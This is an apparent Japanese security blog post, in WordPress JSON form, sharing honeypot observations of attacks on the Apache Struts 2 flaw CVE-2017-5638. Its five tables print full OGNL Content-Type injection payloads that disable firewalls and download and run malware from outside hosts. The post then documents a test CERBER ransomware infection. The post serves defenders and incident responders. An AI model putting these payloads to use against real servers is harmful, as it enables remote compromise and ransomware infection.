{"id":1143,"date":"2017-03-31T23:08:35","date_gmt":"2017-03-31T14:08:35","guid":{"rendered":"http:\/\/csirt.ninja\/?p=1143"},"modified":"2017-04-02T01:12:27","modified_gmt":"2017-04-01T16:12:27","slug":"apache-struts-2-%e3%81%ae%e3%83%9e%e3%83%ab%e3%83%81%e3%83%91%e3%83%bc%e3%82%b5%e3%83%bc%e3%80%8cjakarta%e3%80%8dcve-2017-5638s2-045s2-046%e3%81%ae%e8%84%86%e5%bc%b1%e6%80%a7%e3%82%92%e5%88%a9","status":"publish","type":"post","link":"https:\/\/csirt.ninja\/?p=1143","title":{"rendered":"Apache Struts 2 \u306e\u30de\u30eb\u30c1\u30d1\u30fc\u30b5\u30fc\u300cjakarta\u300d(CVE-2017-5638)(S2-045)(S2-046)\u306e\u8106\u5f31\u6027\u3092\u5229\u7528\u3057\u305f\u653b\u6483\u60c5\u5831\u30e1\u30e2"},"content":{"rendered":"<p>&nbsp;<br \/>\nApache Struts 2 \u306e\u30de\u30eb\u30c1\u30d1\u30fc\u30b5\u30fc\u300cjakarta\u300d\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u30ea\u30e2\u30fc\u30c8\u304b\u3089\u4efb\u610f\u306e\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u53ef\u80fd\u306a\u8106\u5f31\u6027(CVE-2017-5638)\uff08S2-045\uff09\uff08S2-046\uff09\u304c\u516c\u958b\u3055\u308c\u3066\u304b\u3089\u591a\u304f\u306e\u88ab\u5bb3\u304c\u767a\u751f\u3057\u3066\u3044\u307e\u3059\u3002<br \/>\n\u5177\u4f53\u7684\u306a\u88ab\u5bb3\u3068\u3057\u3066\u306f\u3001Web\u30b5\u30a4\u30c8\u6539\u3056\u3093\u3001WebShell\u306e\u8a2d\u7f6e\u3084\u60c5\u5831\u306e\u7a83\u53d6\u3002\u524a\u9664\u306a\u3069\u304c\u5831\u544a\u3055\u308c\u3066\u3044\u307e\u3059\u3002<br \/>\n\u3053\u306e2\u3064\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066\u306f\u4ee5\u4e0b\u306e\u30b5\u30a4\u30c8\u3092\u53c2\u8003\u306b\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.softbanktech.jp\/information\/2017\/20170308-01\/\" target=\"_blank\">\u30fbApache Struts 2 \u306e\u30de\u30eb\u30c1\u30d1\u30fc\u30b5\u30fc\u300cjakarta\u300d\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u30ea\u30e2\u30fc\u30c8\u304b\u3089\u4efb\u610f\u306e\u30b3\u30fc\u30c9\u304b\u3099\u5b9f\u884c\u53ef\u80fd\u306a\u8106\u5f31\u6027(CVE-2017-5638)\uff08S2-045\uff09\u306b\u95a2\u3059\u308b\u8abf\u67fb\u30ec\u30dd\u30fc\u30c8<\/a><\/p>\n<p><a href=\"https:\/\/www.softbanktech.jp\/information\/2017\/20170328-01\/\" target=\"_blank\">\u30fbApache Struts 2 \u306e\u30de\u30eb\u30c1\u30d1\u30fc\u30b5\u30fc\u300cjakarta\u300d\u304a\u3088\u3073\u300cjakarta-stream\u300d\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u30ea\u30e2\u30fc\u30c8\u304b\u3089\u4efb\u610f\u306e\u30b3\u30fc\u30c9\u304b\u3099\u5b9f\u884c\u53ef\u80fd\u306a\u8106\u5f31\u6027(CVE-2017-5638)\uff08S2-046\uff09\u306b\u95a2\u3059\u308b\u8abf\u67fb\u30ec\u30dd\u30fc\u30c8<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>\u3053\u3053\u3067\u306f\u3001\u8106\u5f31\u6027\u3092\u5229\u7528\u3059\u308b\u653b\u6483\u306b\u3064\u3044\u3066\u79c1\u304c\u7ba1\u7406\u3057\u3066\u3044\u308b\u30cf\u30cb\u30fc\u30dd\u30c3\u30c8\u3084\u77e5\u4eba\u304b\u3089\u63d0\u4f9b\u3044\u305f\u3060\u3044\u305f\u60c5\u5831\u3092\u5143\u306b\u653b\u6483\u6642\u306b\u5229\u7528\u3055\u308c\u305f\u4efb\u610f\u306e\u30b3\u30de\u30f3\u30c9\u3068\u305d\u306e\u30b3\u30de\u30f3\u30c9\u306b\u3088\u3063\u3066\u653b\u6483\u5bfe\u8c61\u4e0a\u306b\u914d\u7f6e\u3055\u308c\u3088\u3046\u3068\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u306e\u60c5\u5831\u306b\u3064\u3044\u3066\u5171\u6709\u3057\u307e\u3059\u3002<br \/>\n\u4ee5\u4e0b\u3001\u30cf\u30c3\u30b7\u30e5\u5024\u306e\u6587\u5b57\u5217\u306fVirusTotal\u3067\u30b9\u30ad\u30e3\u30f3\u3057\u305f\u7d50\u679c\u3078\u306e\u30ea\u30f3\u30af\u3068\u306a\u3063\u3066\u304a\u308a\u307e\u3059\u3002<br \/>\n\u307e\u305f\u3001\u5171\u6709\u3059\u308b\u60c5\u5831\u306e\u653b\u6483\u306b\u7528\u3044\u3089\u305f\u6587\u5b57\u5217\u306f\u4e00\u90e8\u52a0\u5de5\u3092\u3057\u3066\u3042\u308a\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td colspan=\"2\" align=\"center\"><font color=\"yellow\">\u653b\u6483\u60c5\u5831 #01<\/font><\/td>\n<\/tr>\n<tr>\n<td align=\"center\" nowrap>Content-Type\u5185\u306b<br \/>\u542b\u307e\u308c\u308b\u6587\u5b57\u5217<\/td>\n<td>(#cmd=&#8217;\/etc\/init.d\/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http:\/\/aaa.linuxa.club:xxxxxx\/linux;chmod 777 linux;.\/linux;chattr +i linux;&#8217;).(#iswin=(@java.lang.System@getProperty(&#8216;os.name&#8217;).toLowerCase().contains(&#8216;win&#8217;))).(#cmds=(#iswin?{&#8216;cmd.exe&#8217;,&#8217;\/c&#8217;,#cmd}:{&#8216;\/bin\/bash&#8217;,&#8217;-c&#8217;,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}<\/td>\n<\/tr>\n<tr>\n<td nowrap>\u914d\u7f6e\u30d5\u30a1\u30a4\u30eb\u30cf\u30c3\u30b7\u30e5\u5024<\/td>\n<td><a href=\"https:\/\/www.virustotal.com\/ja\/file\/430741e10fedd90995f31a62bbfccbac73f6483f47074d90e0b3c91b3cf03228\/analysis\/\" target=\"_blank\">MD5: 64226B8C91A00D1C95DDDB72060CEB04<br \/>SHA-1: D23FB69892815063535CB1FFECA2DF9B64D62B25<\/a>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<table>\n<tbody>\n<tr>\n<td colspan=\"2\" align=\"center\"><font color=\"yellow\">\u653b\u6483\u60c5\u5831 #02<\/font><\/td>\n<\/tr>\n<tr>\n<td align=\"center\" nowrap>Content-Type\u5185\u306b<br \/>\u542b\u307e\u308c\u308b\u6587\u5b57\u5217<\/td>\n<td>(#cmd=&#8217;\/etc\/init.d\/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http:\/\/61.160.211.200:xxxxx\/1.svchost;&#8217;).(#iswin=(@java.lang.System@getProperty(&#8216;os.name&#8217;).toLowerCase().contains(&#8216;win&#8217;))).(#cmds=(#iswin?{&#8216;cmd.exe&#8217;,&#8217;\/c&#8217;,#cmd}:{&#8216;\/bin\/bash&#8217;,&#8217;-c&#8217;,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}<\/td>\n<\/tr>\n<tr>\n<td nowrap>\u914d\u7f6e\u30d5\u30a1\u30a4\u30eb\u30cf\u30c3\u30b7\u30e5\u5024<\/td>\n<td><a href=\"https:\/\/www.virustotal.com\/ja\/file\/f8bd024e0f278f011dc20863fd1aac7722141f141097cb02b893e1200563e7f6\/analysis\/\" target=\"_blank\">MD5: 821ACEAFA328BE634B572C53923C775C<br \/>SHA-1: F6BD3B3D44F424BB55EB36C92BED5428D3C6193B<\/a>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<table>\n<tbody>\n<tr>\n<td colspan=\"2\" align=\"center\"><font color=\"yellow\">\u653b\u6483\u60c5\u5831 #03<\/font><\/td>\n<\/tr>\n<tr>\n<td align=\"center\" nowrap>Content-Type\u5185\u306b<br \/>\u542b\u307e\u308c\u308b\u6587\u5b57\u5217<\/td>\n<td>(#cmd=&#8217;\/etc\/init.d\/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd \/tmp;wget -c http:\/\/180.100.235.26:xxxxx\/6;chmod 777 6;.\/6;&#8217;).(#iswin=(@java.lang.System@getProperty(&#8216;os.name&#8217;).toLowerCase().contains(&#8216;win&#8217;))).(#cmds=(#iswin?{&#8216;cmd.exe&#8217;,&#8217;\/c&#8217;,#cmd}:{&#8216;\/bin\/bash&#8217;,&#8217;-c&#8217;,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}<\/td>\n<\/tr>\n<tr>\n<td nowrap>\u914d\u7f6e\u30d5\u30a1\u30a4\u30eb\u30cf\u30c3\u30b7\u30e5\u5024<\/td>\n<td><a href=\"https:\/\/www.virustotal.com\/ja\/file\/98bd48f1574a891b5ae8dff726671255e10b4b30c2f562f3edc5f6f89f35804d\/analysis\/\" target=\"_blank\">MD5: CDC457633178E845BB4B306531A4588B<br \/>SHA-1: F4BB1CBDAB37E0107A9C9927F57B091C9A0F09BD<\/a>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<table>\n<tbody>\n<tr>\n<td colspan=\"2\" align=\"center\"><font color=\"yellow\">\u653b\u6483\u60c5\u5831 #04<\/font><\/td>\n<\/tr>\n<tr>\n<td align=\"center\" nowrap>Content-Type\u5185\u306b<br \/>\u542b\u307e\u308c\u308b\u6587\u5b57\u5217<\/td>\n<td>(#cmd=&#8217;BITSAdmin.exe \/Transfer JOB http:\/\/82.165.129.119:xxxxx\/UnInstall.exe %TEMP%\/UnInstall.exe &#038; %TEMP%\/UnInstall.exe&#8217;).(#iswin=(@java.lang.System@getProperty(&#8216;os.name&#8217;).toLowerCase().contains(&#8216;win&#8217;))).(#cmds=(#iswin?{&#8216;cmd.exe&#8217;,&#8217;\/c&#8217;,#cmd}:{&#8216;\/bin\/bash&#8217;,&#8217;-c&#8217;,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}<\/td>\n<\/tr>\n<tr>\n<td nowrap>\u914d\u7f6e\u30d5\u30a1\u30a4\u30eb\u30cf\u30c3\u30b7\u30e5\u5024<\/td>\n<td><a href=\"https:\/\/www.virustotal.com\/ja\/file\/751b436bd85e24a7774881d2c1dbe4cb98aef65672ed149bba39c29824dfbbaf\/analysis\/\" target=\"_blank\">MD5: 14012ECCEC6FF1072BD5F0A16EB4EFD0<br \/>SHA-1: B62305163A11274F0D8401EFBE4BE4793FC23C0B<\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<table>\n<tbody>\n<tr>\n<td colspan=\"2\" align=\"center\"><font color=\"yellow\">\u653b\u6483\u60c5\u5831 #05<\/font><\/td>\n<\/tr>\n<tr>\n<td align=\"center\" nowrap>Content-Type\u5185\u306b<br \/>\u542b\u307e\u308c\u308b\u6587\u5b57\u5217<\/td>\n<td>(#cmd=&#8217;cmd.exe \/c echo open 82.165.129.119 xxxxx >> ik &#038;echo user anonymous anonymous>> ik &#038;echo binary >> ik &#038;echo get 1.exe >> ik &#038;echo bye >> ik &#038;ftp -n -v -s:ik &#038;del ik &#038;1.exe &#038;exit&#8217;).(#iswin=(@java.lang.System@getProperty(&#8216;os.name&#8217;).toLowerCase().contains(&#8216;win&#8217;))).(#cmds=(#iswin?{&#8216;cmd.exe&#8217;,&#8217;\/c&#8217;,#cmd}:{&#8216;\/bin\/bash&#8217;,&#8217;-c&#8217;,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}}<\/td>\n<\/tr>\n<tr>\n<td nowrap>\u914d\u7f6e\u30d5\u30a1\u30a4\u30eb\u30cf\u30c3\u30b7\u30e5\u5024<\/td>\n<td><a href=\"https:\/\/www.virustotal.com\/ja\/file\/08c368769ff51415ef8c727a432d864a79ac9bbffb3ff2bff49939a468f7304e\/analysis\/\" target=\"_blank\">MD5: 82C68596A6AFDC322B91A96E2736813B<br \/>SHA-1: 8018FCD789CE6E5B913F74124386D24D86CB15EF<\/a>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<br \/>\n&nbsp;<\/p>\n<p>\u4e0a\u8a18\u3001\u300c\u653b\u6483\u60c5\u5831 #01\u300d\u304a\u3088\u3073\u300c\u653b\u6483\u60c5\u5831 #02\u300d\u300c\u653b\u6483\u60c5\u5831 #03\u300d\u306fLinux\u7cfbOS\u3067\u5229\u7528\u3059\u308b\u305f\u3081\u306e\u653b\u6483\u30c4\u30fc\u30eb\u3067\u3057\u305f\u3002\u3053\u308c\u3089\u306fSSH\u306e\u30cf\u30cb\u30fc\u30dd\u30c3\u30c8\u306a\u3069\u3067\u3082\u6bd4\u8f03\u7684\u89b3\u6e2c\u3055\u308c\u3084\u3059\u3044\u3082\u306e\u3067\u3059\u3002\u4eca\u56de\u306e\u653b\u6483\u60c5\u5831\u306e\u4e2d\u3067\u8208\u5473\u6df1\u304b\u3063\u305f\u3082\u306e\u3068\u3057\u3066\u306f\u300c\u653b\u6483\u60c5\u5831 #04\u300d\u300c\u653b\u6483\u60c5\u5831 #05\u300d\u304c\u3042\u3052\u3089\u308c\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u4eca\u56de\u306eStruts2\u306e\u8106\u5f31\u6027\u3092\u5229\u7528\u3057\u3066Windows\u7cfbOS\u306b\u611f\u67d3\u3059\u308b\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u300cCERBER\u300d\u306b\u611f\u67d3\u3055\u305b\u3088\u3046\u3068\u3059\u308b\u3082\u306e\u3067\u3057\u305f\u3002<br \/>\n\u4ee5\u4e0b\u306b\u3001\u300c\u653b\u6483\u60c5\u5831 #04\u300d\u306b\u3042\u308b\u8106\u5f31\u6027\u3092\u5229\u7528\u3057\u305f\u653b\u6483\u3067\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3001\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u308b\u300cCERBER\u300d\u3078\u306e\u611f\u67d3\u3092\u8a66\u307f\u305f\u7d50\u679c\u3092\u5171\u6709\u3057\u307e\u3059\u3002<\/p>\n<p>\u3010\u611f\u67d3\u306e\u691c\u8a3c\u3011<br \/>\n\u611f\u67d3\u524d\u306e\u30c7\u30b9\u30af\u30c8\u30c3\u30d7\u306e\u72b6\u614b<br \/>\n<a href=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/1.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/1-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" class=\"alignnone size-medium wp-image-1149\" srcset=\"https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/1-300x200.jpg 300w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/1-768x511.jpg 768w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/1-1024x682.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u611f\u67d3\u5f8c\u306e\u30c7\u30b9\u30af\u30c8\u30c3\u30d7\u306e\u72b6\u614b<br \/>\n<a href=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/2.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/2-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" class=\"alignnone size-medium wp-image-1150\" srcset=\"https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/2-300x200.jpg 300w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/2-768x511.jpg 768w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/2-1024x682.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\n\u611f\u67d3\u5f8c\u3001\u5f8c\u8ff0\u3059\u308b\u753b\u50cf\u306b\u8a18\u8f09\u3055\u308c\u3066\u3044\u308b\u6587\u7ae0\u3092\u8aad\u307f\u4e0a\u3052\u308b\u82f1\u8a9e\u306e\u97f3\u58f0\u304c\u518d\u751f\u3055\u308c\u307e\u3059\u3002<\/p>\n<p>\u307e\u305f\u611f\u67d3\u5f8c\u306b\u306f\u30c7\u30b9\u30af\u30c8\u30c3\u30d7\u3084\u30d5\u30a9\u30eb\u30c0\u306b\u3044\u304f\u3064\u304b\u306e\u30d5\u30a1\u30a4\u30eb\u304c\u8ffd\u52a0\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002<br \/>\n\u8ffd\u52a0\u3055\u308c\u3066\u3044\u305f\u30d5\u30a1\u30a4\u30eb\u306f\u4ee5\u4e0b\u306e\u901a\u308a\u3067\u3059\u3002<\/p>\n<p>\u8ffd\u52a0\u3055\u308c\u305f\u753b\u50cf\u30d5\u30a1\u30a4\u30eb<br \/>\n<a href=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/3.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/3-300x234.jpg\" alt=\"\" width=\"300\" height=\"234\" class=\"alignnone size-medium wp-image-1151\" srcset=\"https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/3-300x234.jpg 300w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/3-768x600.jpg 768w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/3-1024x800.jpg 1024w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/3.jpg 1538w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u8ffd\u52a0\u3055\u308c\u305f\u30c6\u30ad\u30b9\u30c8<br \/>\n<a href=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/4.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/4-300x268.jpg\" alt=\"\" width=\"300\" height=\"268\" class=\"alignnone size-medium wp-image-1152\" srcset=\"https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/4-300x268.jpg 300w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/4-768x687.jpg 768w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/4-1024x916.jpg 1024w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/4.jpg 1404w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u8ffd\u52a0\u3055\u308c\u305fhta\u30d5\u30a1\u30a4\u30eb<br \/>\n<a href=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/5.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" class=\"alignnone size-medium wp-image-1153\" srcset=\"https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/5-300x200.jpg 300w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/5-768x511.jpg 768w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/5-1024x682.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u3010\u611f\u67d3\u5f8c\u306e\u652f\u6255\u3044\u30b5\u30a4\u30c8\u3078\u306e\u30a2\u30af\u30bb\u30b9\u3011<br \/>\n\u8ffd\u52a0\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u306a\u3069\u306b\u8a18\u8f09\u3055\u308c\u3066\u3044\u305fURL\u3078Tor Browser\u3092\u4f7f\u3063\u3066\u30a2\u30af\u30bb\u30b9\u3057\u307e\u3057\u305f\u3002<br \/>\n\u30a2\u30af\u30bb\u30b9\u3057\u305f\u30c8\u30c3\u30d7\u30da\u30fc\u30b8\u3067\u306f\u4e0b\u56f3\u306e\u3088\u3046\u306b\u8a00\u8a9e\u3092\u9078\u3076\u753b\u9762\u304c\u8868\u793a\u3055\u308c\u307e\u3057\u305f\u3002<br \/>\n<a href=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/6.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/6-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" class=\"alignnone size-medium wp-image-1154\" srcset=\"https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/6-300x222.jpg 300w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/6-768x569.jpg 768w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/6-1024x759.jpg 1024w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/6.jpg 1579w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u65e5\u672c\u8a9e\u3092\u9078\u629e\u3057\u305f\u7d50\u679c\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u652f\u6255\u3044\u3092\u4fc3\u3059\u30da\u30fc\u30b8\u306b\u9077\u79fb\u3057\u307e\u3057\u305f\u3002<br \/>\n<a href=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/7.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/7-300x243.jpg\" alt=\"\" width=\"300\" height=\"243\" class=\"alignnone size-medium wp-image-1155\" srcset=\"https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/7-300x243.jpg 300w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/7-768x623.jpg 768w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/7-1024x830.jpg 1024w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/7.jpg 1809w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u4e0a\u8a18\u306e\u30da\u30fc\u30b8\u306e\u4ed6\u306b\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30da\u30fc\u30b8\u304c\u5b58\u5728\u3057\u307e\u3057\u305f\u3002<\/p>\n<p>\u300c\u3088\u304f\u3042\u308b\u8cea\u554f\u300d\u30da\u30fc\u30b8<br \/>\n<a href=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/8.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/8-300x131.jpg\" alt=\"\" width=\"300\" height=\"131\" class=\"alignnone size-medium wp-image-1156\" srcset=\"https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/8-300x131.jpg 300w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/8-768x335.jpg 768w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/8-1024x447.jpg 1024w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/8.jpg 1809w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u300c\u30b5\u30dd\u30fc\u30c8\u300d\u30da\u30fc\u30b8<br \/>\n<a href=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/9.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/9-300x141.jpg\" alt=\"\" width=\"300\" height=\"141\" class=\"alignnone size-medium wp-image-1157\" srcset=\"https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/9-300x141.jpg 300w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/9-768x362.jpg 768w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/9-1024x483.jpg 1024w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/9.jpg 1809w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u300c1\u3064\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u7121\u6599\u3067\u5fa9\u53f7\u5316\u300d\u30da\u30fc\u30b8<br \/>\n<a href=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/0.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/0-300x144.jpg\" alt=\"\" width=\"300\" height=\"144\" class=\"alignnone size-medium wp-image-1158\" srcset=\"https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/0-300x144.jpg 300w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/0-768x370.jpg 768w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/0-1024x493.jpg 1024w, https:\/\/csirt.ninja\/wp-content\/uploads\/2017\/03\/0.jpg 1808w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u60c5\u5831\u5171\u6709\u306f\u4ee5\u4e0a\u3067\u3059\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Apache Struts 2 \u306e\u30de\u30eb\u30c1\u30d1\u30fc\u30b5\u30fc\u300cjakarta\u300d\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u30ea\u30e2\u30fc\u30c8\u304b\u3089\u4efb\u610f\u306e\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u53ef\u80fd\u306a\u8106\u5f31\u6027(CVE-2017-5638)\uff08S2-045\uff09\uff08S2-046\uff09\u304c\u516c\u958b\u3055\u308c\u3066\u304b\u3089\u591a\u304f [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1147,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,20,21],"tags":[],"views":48926,"_links":{"self":[{"href":"https:\/\/csirt.ninja\/index.php?rest_route=\/wp\/v2\/posts\/1143"}],"collection":[{"href":"https:\/\/csirt.ninja\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/csirt.ninja\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/csirt.ninja\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/csirt.ninja\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1143"}],"version-history":[{"count":15,"href":"https:\/\/csirt.ninja\/index.php?rest_route=\/wp\/v2\/posts\/1143\/revisions"}],"predecessor-version":[{"id":1169,"href":"https:\/\/csirt.ninja\/index.php?rest_route=\/wp\/v2\/posts\/1143\/revisions\/1169"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/csirt.ninja\/index.php?rest_route=\/wp\/v2\/media\/1147"}],"wp:attachment":[{"href":"https:\/\/csirt.ninja\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1143"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/csirt.ninja\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1143"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/csirt.ninja\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1143"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}